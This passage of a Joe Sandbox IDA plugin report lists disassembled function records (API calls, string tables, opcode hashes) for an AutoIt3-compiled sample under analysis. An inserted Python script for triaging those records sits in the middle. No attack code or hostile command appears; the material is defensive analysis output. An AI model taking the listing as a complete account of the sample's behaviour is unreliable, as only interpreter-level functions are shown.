                    • Instruction Fuzzy Hash: A0C04CF1810109DBDB05DB90D998EFE77BCAB04304F144055A501F2100DB749B44CE71
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C9A36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 715b06ad4cd9bb06e418b922134e54db3db614d46343a3f6899f98745279acf6
                    • Instruction ID: 902542f15faa6bbdff30e871c8a12a585ed39a35907e6b133a4978fd106bd6d6
                    • Opcode Fuzzy Hash: 715b06ad4cd9bb06e418b922134e54db3db614d46343a3f6899f98745279acf6
                    • Instruction Fuzzy Hash: 9AA0123000010CA78A001B41EC045587F6DDA001907004020F40C40031873254118581
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 89b848542918b4807727e267534b154f83c7f56e1a6edaa6c431cdf59c5885d7
                    • Instruction ID: f3300719b81c6cafcdd5e489713442c2f682129d7d9b89d63a8ceac2dc6fd5f4
                    • Opcode Fuzzy Hash: 89b848542918b4807727e267534b154f83c7f56e1a6edaa6c431cdf59c5885d7
                    • Instruction Fuzzy Hash: 9A223B30905615CBCF38AB19C484B7DB7A1EF41308FA9446ED462CBA95DB34EEC9CB64
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 4e3f9bbfed6c777771809c20d50da34d7d130bdff6e89329ebf851dca6a0c105
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 41C181322050930ADF2D867AD47913EBAE15BA27B131E075DE8F3DB5D5EF20D624E620
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 0f8cf55cd0e65934bac73b9cb22d4e8abc5f802f52ba6422de80de5c72f23b7d
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 53C170332051930ADF6D463A943913EBBE15BA27B131E076DE8F3DB5D4EF20D624A620
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 2bed4471a4ad3893e2d3f021005dcffa03ba3406952ecc0962ac61975f0af7fc
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 77C1733620919309DF6D467A943A13EBBE15BA27B131E076DECB3CB5D4EF20D624D620
                    APIs
                    • CharUpperBuffW.USER32(?,?,00CFF910), ref: 00CF38AF
                    • IsWindowVisible.USER32(?), ref: 00CF38D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: fbba09ba3e787d40360d8a002bbc414cc9a42d8475f729e92af018f3cdb39f38
                    • Instruction ID: 9e0da002150656c3cbe16efff1948833a6f9782d5292dd83766b240a6f3fd1b7
                    • Opcode Fuzzy Hash: fbba09ba3e787d40360d8a002bbc414cc9a42d8475f729e92af018f3cdb39f38
                    • Instruction Fuzzy Hash: B5D1BD30204249AFCB14EF11C495A7EBBA1EF94354F10845DF9865B3A2CB71EE4AEB52
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00CFA89F
                    • GetSysColorBrush.USER32(0000000F), ref: 00CFA8D0
                    • GetSysColor.USER32(0000000F), ref: 00CFA8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 00CFA8F6
                    • SelectObject.GDI32(?,?), ref: 00CFA905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFA930
                    • GetSysColor.USER32(00000010), ref: 00CFA938
                    • CreateSolidBrush.GDI32(00000000), ref: 00CFA93F
                    • FrameRect.USER32(?,?,00000000), ref: 00CFA94E
                    • DeleteObject.GDI32(00000000), ref: 00CFA955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00CFA9A0
                    • FillRect.USER32(?,?,?), ref: 00CFA9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFA9FD
                      • Part of subcall function 00CFAB60: GetSysColor.USER32(00000012), ref: 00CFAB99
                      • Part of subcall function 00CFAB60: SetTextColor.GDI32(?,?), ref: 00CFAB9D
                      • Part of subcall function 00CFAB60: GetSysColorBrush.USER32(0000000F), ref: 00CFABB3
                      • Part of subcall function 00CFAB60: GetSysColor.USER32(0000000F), ref: 00CFABBE
                      • Part of subcall function 00CFAB60: GetSysColor.USER32(00000011), ref: 00CFABDB
                      • Part of subcall function 00CFAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFABE9
                      • Part of subcall function 00CFAB60: SelectObject.GDI32(?,00000000), ref: 00CFABFA
                      • Part of subcall function 00CFAB60: SetBkColor.GDI32(?,00000000), ref: 00CFAC03
                      • Part of subcall function 00CFAB60: SelectObject.GDI32(?,?), ref: 00CFAC10
                      • Part of subcall function 00CFAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00CFAC2F
                      • Part of subcall function 00CFAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFAC46
                      • Part of subcall function 00CFAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00CFAC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 9478b64627b16432615f81e12831619fd4d8b182328077133e145e2d36064915
                    • Instruction ID: d5aac3c704fc3acbf77c16e6058921ab02e112c86570bca9a33034409fce7fcc
                    • Opcode Fuzzy Hash: 9478b64627b16432615f81e12831619fd4d8b182328077133e145e2d36064915
                    • Instruction Fuzzy Hash: 4CA17AB2008305AFD7509F64DC08B6FBBA9FF88321F104A2DFA66961A0D771D946CB53
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00CE77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CE78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CE78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CE7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CE7946
                    • GetClientRect.USER32(00000000,?), ref: 00CE7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CE7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CE79A5
                    • GetStockObject.GDI32(00000011), ref: 00CE79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 00CE79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CE79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CE79D2
                    • DeleteDC.GDI32(00000000), ref: 00CE79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CE7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CE7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CE7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CE7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CE7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CE7AAE
                    • GetStockObject.GDI32(00000011), ref: 00CE7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CE7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CE7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: b74c8c1df2cd6ba685a9153aef83f6709f9a6f1609e5f108f86fde5ff39d44ea
                    • Instruction ID: ddc9b47a77699e182b406ca53ea882ce57bba5abed40b7fa2d31db91aa6f991c
                    • Opcode Fuzzy Hash: b74c8c1df2cd6ba685a9153aef83f6709f9a6f1609e5f108f86fde5ff39d44ea
                    • Instruction Fuzzy Hash: 61A15E71A40219BFEB149BA4DC4AFAF7BA9EF44710F118118FA15E72E0CB70AD01CB65
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDAF89
                    • GetDriveTypeW.KERNEL32(?,00CFFAC0,?,\\.\,00CFF910), ref: 00CDB066
                    • SetErrorMode.KERNEL32(00000000,00CFFAC0,?,\\.\,00CFF910), ref: 00CDB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 7406318d109117b850813881e275104e4460c76ca4e508b2a50020c2f335835e
                    • Instruction ID: 735449493270a0b7b5bf1b9fe0ac491233a2b481724ca4f1cbb2d10d0ef32b60
                    • Opcode Fuzzy Hash: 7406318d109117b850813881e275104e4460c76ca4e508b2a50020c2f335835e
                    • Instruction Fuzzy Hash: B851F330680309EFCF04DB15D992D7D73B1EF243457228027E62AA7390C775AE4AEB66
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: cb8ea46e306ba0519ddb617652bf0d1f865b670d94407ab32ce5aea497c68ecd
                    • Instruction ID: 725687273e58411d06bbf7253d908adcd8347474e91cf15f7f5dd35abdd8ce4a
                    • Opcode Fuzzy Hash: cb8ea46e306ba0519ddb617652bf0d1f865b670d94407ab32ce5aea497c68ecd
                    • Instruction Fuzzy Hash: 62812A70600646BBCF21AB61CC87FBE7768EF12700F048025FD59AA1C2EB65DB55F2A1
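                    The records above (the window of class `AutoIt v3` with its `msctls_progress32` progress bar, the `SetErrorMode`/`GetDriveTypeW` routine with its drive-type string table, and the parser for `#include`, `#requireadmin` and the other directives) are code of the stock AutoIt3 interpreter rather than of the script it carries, so when triaging a listing like this it helps to separate interpreter functions from the rest before reading further. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in the `APIs` / `String ID` layout used above and flags functions that reference interpreter-only markers. The marker set is an assumption made for this example, and the sample records are constructed from trimmed bullets of the listing above.

```python
"""Parse Joe Sandbox per-function API records and flag AutoIt3 interpreter code."""
import re
from collections import Counter
from dataclasses import dataclass, field

# One "APIs" bullet, in the three shapes the report uses:
#   • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000), ref: 00CE7946
#   • Part of subcall function 00CFAB60: RoundRect.GDI32(?,?), ref: 00CFAC46
#   • _memset.LIBCMT ref: 00CF8EB1                (no argument list, no comma)
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
# Any other "• Key: value" bullet (String ID, API ID, Source File, ...).
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Strings carried by the stock AutoIt3 interpreter: its GUI/progress window
# class names and its script-preprocessor directives. Assumption for this
# example: a function referencing one of them is interpreter code, not logic
# from the embedded compiled script.
AUTOIT_MARKERS = {"AutoIt v3", "AutoIt v3 GUI", "#OnAutoItStartRegister",
                  "#requireadmin", "#include-once", "#notrayicon", "#pragma compile"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""   # set when the bullet reads "Part of subcall function X"


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # from "• String ID: a$b$c"


def parse_records(text):
    """Split report text into FuncRecords, one per "APIs" heading."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncRecord()
            records.append(cur)
        elif cur is None or not line.startswith("•"):
            continue
        elif (m := API_RE.match(line)):
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.calls.append(Call(m.group("api"), m.group("mod"), args,
                                  m.group("ref") or "", m.group("sub") or ""))
        elif (f := FIELD_RE.match(line)) and f.group("key") == "String ID":
            cur.strings = [s for s in f.group("val").split("$") if s]
    return records


def autoit_markers(rec):
    """Interpreter-only strings a record references (String ID or call arguments)."""
    seen = set(rec.strings)
    for c in rec.calls:
        seen.update(c.args)
    return sorted(seen & AUTOIT_MARKERS)


def module_profile(records):
    """Count direct (non-subcall) API calls per module across all records."""
    return Counter(c.module for r in records for c in r.calls if not c.subcall_of)


def flag_interpreter_code(records):
    """(index, markers) for every record that references an AutoIt3 marker."""
    return [(i, autoit_markers(r)) for i, r in enumerate(records) if autoit_markers(r)]


# Constructed sample: three records built from trimmed bullets of the listing above.
SAMPLE = r"""
APIs
• DestroyWindow.USER32(00000000), ref: 00CE77F1
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CE7946
• GetDesktopWindow.USER32 ref: 00CF4C66
  • Part of subcall function 00C71B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00C71B9A
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CE7A59
Similarity
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00CDAF89
• GetDriveTypeW.KERNEL32(?,00CFFAC0,?,\\.\,00CFF910), ref: 00CDB066
• SetErrorMode.KERNEL32(00000000,00CFFAC0,?,\\.\,00CFF910), ref: 00CDB1C4
Similarity
• String ID: 1394$ATA$CDROM$Fixed$Network$PhysicalDrive$Removable$USB$Unknown$\\.\$iSCSI
APIs
Strings
Similarity
• String ID: #OnAutoItStartRegister$#ce$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print("module profile:", dict(module_profile(recs)))
    for i, markers in flag_interpreter_code(recs):
        print(f"record {i}: AutoIt3 interpreter markers {markers}")
```

                    The parser keys on the `APIs` heading that opens each record, so the whole listing can be pasted in as-is. `Part of subcall function` bullets are kept on the record (they show which helper the function reaches) but are excluded from the per-module count so that a helper's calls are not attributed to every caller as well. Functions with no marker hit still need manual review; an empty marker list means only that the function does not touch one of the assumed interpreter strings.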
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00C72CA2
                    • DeleteObject.GDI32(00000000), ref: 00C72CE8
                    • DeleteObject.GDI32(00000000), ref: 00C72CF3
                    • DestroyCursor.USER32(00000000), ref: 00C72CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00C72D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CAC68B
                    • 6F560200.COMCTL32(?,000000FF,?), ref: 00CAC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00CACAED
                      • Part of subcall function 00C71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C72036,?,00000000,?,?,?,?,00C716CB,00000000,?), ref: 00C71B9A
                    • SendMessageW.USER32(?,00001053), ref: 00CACB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CACB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DestroyMessageSendWindow$DeleteObject$CursorF560200InvalidateMoveRect
                    • String ID: 0
                    • API String ID: 3972741187-4108050209
                    • Opcode ID: a8d2a1791152a02f984ebbfe9e03cafa6d76b3b975deec560e5ba4832c8f169d
                    • Instruction ID: 0a9ab431ffba90a641897ef016eeec9bf8ad29a252414536e8c3334170c9f9b7
                    • Opcode Fuzzy Hash: a8d2a1791152a02f984ebbfe9e03cafa6d76b3b975deec560e5ba4832c8f169d
                    • Instruction Fuzzy Hash: 10128D30604202EFDB21CF24C884BA9B7E5FF56314F548569F9A9DB262CB31ED42DB91
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00CFAB99
                    • SetTextColor.GDI32(?,?), ref: 00CFAB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 00CFABB3
                    • GetSysColor.USER32(0000000F), ref: 00CFABBE
                    • CreateSolidBrush.GDI32(?), ref: 00CFABC3
                    • GetSysColor.USER32(00000011), ref: 00CFABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFABE9
                    • SelectObject.GDI32(?,00000000), ref: 00CFABFA
                    • SetBkColor.GDI32(?,00000000), ref: 00CFAC03
                    • SelectObject.GDI32(?,?), ref: 00CFAC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFAC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFAC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CFAC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CFACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00CFACEC
                    • DrawFocusRect.USER32(?,?), ref: 00CFACF7
                    • GetSysColor.USER32(00000011), ref: 00CFAD05
                    • SetTextColor.GDI32(?,00000000), ref: 00CFAD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CFAD21
                    • SelectObject.GDI32(?,00CFA869), ref: 00CFAD38
                    • DeleteObject.GDI32(?), ref: 00CFAD43
                    • SelectObject.GDI32(?,?), ref: 00CFAD49
                    • DeleteObject.GDI32(?), ref: 00CFAD4E
                    • SetTextColor.GDI32(?,?), ref: 00CFAD54
                    • SetBkColor.GDI32(?,?), ref: 00CFAD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
